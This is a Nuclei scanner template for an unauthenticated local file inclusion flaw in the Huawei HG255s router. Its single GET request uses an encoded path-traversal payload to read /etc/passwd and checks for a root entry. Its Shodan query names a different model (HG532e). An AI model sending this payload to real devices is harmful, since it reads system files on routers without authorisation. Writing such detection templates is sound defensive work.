id: huawei-hg255s-lfi

info:
  name: Huawei HG255s - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Huawei HG255s is vulnerable to local file inclusion due to insufficient validation of the received HTTP requests. A remote attacker may access the local files on the device without authentication.
  reference:
    - https://cxsecurity.com/issue/WLB-2017090053
    - https://www.youtube.com/watch?v=n02toTFkLOU
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
    shodan-query: http.html:"HG532e"
  tags: huawei,lfi,router

http:
  - method: GET
    path:
      - "{{BaseURL}}/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502205c2265c5810500bef590ca60c76cbbd8f93c05e5089df94c49560fb1308ff574022100d1f403e94079a7d91a2d36d1797f053346c15d902ce19c312989beda68040036:922c64590222798bb761d5b6d8e72950
